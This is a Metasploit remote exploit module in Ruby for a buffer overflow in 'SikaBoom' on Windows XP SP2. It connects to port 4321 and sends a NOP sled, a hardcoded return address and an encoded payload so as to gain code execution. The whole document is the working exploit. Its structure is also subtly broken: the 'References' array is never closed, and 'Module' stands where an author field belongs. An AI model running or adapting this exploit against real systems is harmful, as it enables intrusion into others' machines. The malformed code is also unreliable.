|
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super (update_info(info,
'Name' => 'SikaBoom Remote Buffer overflow' ,
'Description' => %q{
This module exploits a buffer overflow in SikaBoom .
},
'Module' => [ 'Asesino04' ],
'References' =>
[
'DefaultOptions' =>
{
'EXITFUNC' => 'process' ,
},
'Payload' =>
{
'Space' => 268 ,
'BadChars' => "\x00\xff" ,
},
'Platform' => 'win' ,
'Targets' =>
[
[ 'Windows XP SP2 En' ,
{ 'Ret' => 0x5D38827C, 'Offset' => 268 } ],
],
'DefaultTarget' => 0 ,
'Privileged' => false
))
register_options(
[
Opt:: RPORT ( 4321 )
], self . class )
end
def exploit
connect
junk = make_nops(target[ 'Offset' ])
sploit = junk + [target.ret].pack( 'V' ) + make_nops( 50 ) + payload.encoded
sock.put(sploit)
handler
disconnect
end
end
|